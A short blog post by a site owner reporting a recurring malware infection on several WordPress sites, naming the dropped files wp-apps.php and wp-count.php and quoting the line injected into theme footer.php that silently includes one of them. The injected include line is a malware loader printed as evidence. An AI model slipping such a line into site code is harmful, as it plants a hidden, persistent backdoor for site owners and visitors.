Another Malware attack on WordPress sites (wp-apps.php & wp-count.php)

One of my hosting account has been affected by this Malware. So far, haven’t been able to figure out how it got there.

Two files are created in WordPress directories: wp-apps.php and wp-count.php
And in the theme, mostly footer.php is modified. This code gets added to the file.

< ?php error_reporting(0);include_once $_SERVER['DOCUMENT_ROOT'].'/wp-apps.php';? >

Using latest version of WordPress now. I removed the files before couple of times, but the files come back again like after a week.

Some of my websites have WordPress installed in directories, as in domain.com/sometopic/
These folders don’t get affected. Only the ones with TLDs in the name get affected. Also the site in public_html doesn’t get affected. I could try changing all the passwords, too many sites, too many passwords, bummer…besides I wouldn’t find out how did the files get there.

The virus files: wp-count.php.txt & wp-apps.php.txt

Permalink

Leave a Comment

Captcha * Time limit is exhausted. Please reload CAPTCHA.

Related Posts